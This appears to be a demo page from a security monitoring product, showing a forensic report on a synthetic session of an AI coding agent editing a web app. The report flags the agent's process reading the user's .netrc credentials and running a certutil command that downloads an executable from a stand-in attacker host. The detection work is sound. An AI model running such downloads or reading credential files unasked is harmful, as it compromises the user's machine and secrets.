DEMO Read-only showcase seeded with synthetic data. Sign-in, reviewing, rules, retention and alerts are disabled. Browse every page and session freely. Install on your fleet →
Back to session
Sigtrace AI.Trace · Forensic session report

Session ml-workstation-high-119895444

Agent kiro-cli on host ml-workstation · 1m14s

Session ID
ml-workstation-high-119895444
Agent
kiro-cli
Host
ml-workstation
First seen
2026-04-22 20:14:54Z
Last seen
2026-04-22 20:16:08Z
Duration
1m14s
Events captured
31
Posted at
2026-04-22 22:14:21Z
Report generated
2026-04-23 10:28:07Z
Report ID
cd9226beaafdc1dd
Schema version
1
Live dashboard
https://demo.sigtrace.ai/ui/sessions/ml-workstation-high-119895444
Verdict High 2 sensitive paths 1 suspicious cmdline 1 shell spawn 3 network targets

Sensitive path hits · 2

PathReasonOpProcessPidWhen
C:\Users\bill\.netrc netrc open 7102 2026-04-22T20:16:04.570129063Z
C:\Users\bill\.netrc netrc open 7102 2026-04-22T20:16:04.570129063Z

Suspicious host queries · 0

No suspicious host queries.

Suspicious command lines · 1

CmdlineReasonProcessPidWhen
certutil.exe -urlcache -split -f http://bad.example/x.exe C:\Temp\x.exe certutil download C:\Windows\System32\wsl.exe 4466 2026-04-22T20:16:08.570129063Z

Registry persistence · 0

No registry persistence writes.

Flagged image loads · 0

No flagged image loads.

Top processes · 3

ImageCount
C:\Program Files\Git\usr\bin\bash.exe1
C:\Program Files\Kiro-Cli\kiro-cli.exe1
C:\Windows\System32\wsl.exe1

Top file opens · 6

PathCount
C:\work\webapp\src\App.tsx4
C:\work\webapp\vite.config.ts4
C:\work\webapp\package.json3
C:\work\webapp\src\lib\api.ts3
C:\Users\bill\.netrc2
C:\work\webapp\src\components\Dashboard.tsx2

File writes · 4

PathCount
C:\work\webapp\src\App.tsx1
C:\work\webapp\src\components\Dashboard.tsx1
C:\work\webapp\src\lib\api.ts1
C:\work\webapp\vite.config.ts1

File renames / deletes

No renames or deletes.

DNS queries · 3

QueryCount
cdn.jsdelivr.net1
proxy.golang.org1
pypi.org1

TCP targets · 3

TargetCount
104.16.132.229:4431
140.82.114.3:4431
34.107.221.82:4431
End of report · Session ml-workstation-high-119895444 · Report cd9226beaafdc1dd Generated 2026-04-23 10:28:07Z · schema 1